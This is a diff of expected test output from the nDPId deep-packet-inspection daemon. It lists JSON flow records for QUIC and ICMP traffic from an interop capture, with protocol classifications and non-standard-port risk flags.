-00873{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434678,"flow_last_seen":1603816434822,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1283,"flow_avg_l4_payload_len":641,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2600:1f18:2310:d230:5103:7d9e:7d75:374f","src_port":38394,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} 
-00827{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434743,"flow_last_seen":1603816434743,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"131.159.24.198","src_port":48644,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1603816434524,"flow_last_seen":1603816444507,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":10016,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"40.112.191.60","src_port":46334,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"}} 
-00855{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434643,"flow_last_seen":1603816434680,"flow_idle_time":200000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1255,"flow_avg_l4_payload_len":627,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:bc8:47a4:1c25::1","src_port":49270,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} -00825{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1603816434656,"flow_last_seen":1603816435111,"flow_idle_time":200000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":2542,"flow_avg_l4_payload_len":635,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"133.242.206.244","src_port":45855,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} 
-00859{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1603816434729,"flow_last_seen":1603816444586,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":9856,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2606:4700:10::6816:826","src_port":41857,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1603816434507,"flow_last_seen":1603816444490,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":10016,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"71.202.41.169","src_port":37643,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} 
-00823{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1603816434765,"flow_last_seen":1603816435194,"flow_idle_time":200000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":2542,"flow_avg_l4_payload_len":635,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"140.227.52.92","src_port":57926,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434648,"flow_last_seen":1603816434782,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1287,"flow_avg_l4_payload_len":643,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.189.84.245","src_port":34903,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 
+00827{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1603816434587,"flow_last_seen":1603816444528,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":10016,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"193.190.10.98","src_port":59171,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1603816434523,"flow_last_seen":1603816434855,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":2558,"flow_avg_l4_payload_len":639,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"40.112.191.60","src_port":46576,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"}} 
+00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434629,"flow_last_seen":1603816434766,"flow_idle_time":140000,"flow_min_l4_payload_len":556,"flow_max_l4_payload_len":556,"flow_tot_l4_payload_len":1112,"flow_avg_l4_payload_len":556,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"131.159.24.198","dst_ip":"192.168.1.128","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00733{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434507,"flow_last_seen":1603816434657,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":2464,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2400:8902::f03c:91ff:fe69:a454","src_port":38077,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} 
+00872{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434670,"flow_last_seen":1603816434802,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1259,"flow_avg_l4_payload_len":629,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:4800:7817:101:be76:4eff:fe04:631d","src_port":49788,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00838{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1603816434542,"flow_last_seen":1603816444513,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":10016,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"3.121.242.54","src_port":60784,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 
+00826{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434643,"flow_last_seen":1603816434794,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":2504,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"71.202.41.169","src_port":50289,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1603816434569,"flow_last_seen":1603816444507,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":10016,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"131.159.24.198","src_port":34511,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} 
+00659{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":74,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434855,"flow_last_seen":1603816434997,"flow_idle_time":140000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"40.112.191.60","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00835{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434584,"flow_last_seen":1603816434709,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1283,"flow_avg_l4_payload_len":641,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.189.84.245","src_port":43475,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 
+00826{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434640,"flow_last_seen":1603816434640,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"51.158.105.98","src_port":45250,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434822,"flow_last_seen":1603816434822,"flow_idle_time":140000,"flow_min_l4_payload_len":1240,"flow_max_l4_payload_len":1240,"flow_tot_l4_payload_len":1240,"flow_avg_l4_payload_len":1240,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2604:a880:800:a1::1279:3001","dst_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 
+00827{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1603816434664,"flow_last_seen":1603816444508,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":10016,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"193.190.10.98","src_port":59515,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1603816434628,"flow_last_seen":1603816435041,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":2558,"flow_avg_l4_payload_len":639,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"202.238.220.92","src_port":38933,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} 
+00861{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434628,"flow_last_seen":1603816434722,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1279,"flow_avg_l4_payload_len":639,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2604:a880:800:a1::1279:3001","src_port":51040,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1603816434601,"flow_last_seen":1603816435020,"flow_idle_time":200000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":2542,"flow_avg_l4_payload_len":635,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"140.227.52.92","src_port":37784,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} 
+00661{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434530,"flow_last_seen":1603816434530,"flow_idle_time":140000,"flow_min_l4_payload_len":556,"flow_max_l4_payload_len":556,"flow_tot_l4_payload_len":556,"flow_avg_l4_payload_len":556,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"3.121.242.54","dst_ip":"192.168.1.128","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00723{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434659,"flow_last_seen":1603816434682,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1259,"flow_avg_l4_payload_len":629,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2606:4700:10::6816:826","src_port":46353,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} 
+00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1603816434766,"flow_last_seen":1603816435089,"flow_idle_time":140000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":1240,"flow_tot_l4_payload_len":2662,"flow_avg_l4_payload_len":665,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2400:8902::f03c:91ff:fe69:a454","dst_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00872{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434586,"flow_last_seen":1603816434622,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1259,"flow_avg_l4_payload_len":629,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2a05:d018:ce9:8100:cd2a:e2fd:b3be:c5ab","src_port":39945,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} 
+00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":60,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434736,"flow_last_seen":1603816434736,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:19f0:4:34::1","src_port":43645,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1603816434721,"flow_last_seen":1603816435054,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":2590,"flow_avg_l4_payload_len":647,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"138.91.188.147","src_port":39975,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"}} 
+00738{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434507,"flow_last_seen":1603816434548,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1259,"flow_avg_l4_payload_len":629,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2a05:d018:ce9:8100:cd2a:e2fd:b3be:c5ab","src_port":37876,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00851{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434590,"flow_last_seen":1603816434688,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1259,"flow_avg_l4_payload_len":629,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:19f0:4:34::1","src_port":35643,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} 
+00871{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434628,"flow_last_seen":1603816434677,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1267,"flow_avg_l4_payload_len":633,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2a00:ac00:4000:400:2e0:4cff:fe68:199d","src_port":52271,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00824{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1603816434684,"flow_last_seen":1603816435089,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":2558,"flow_avg_l4_payload_len":639,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"202.238.220.92","src_port":35263,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} 
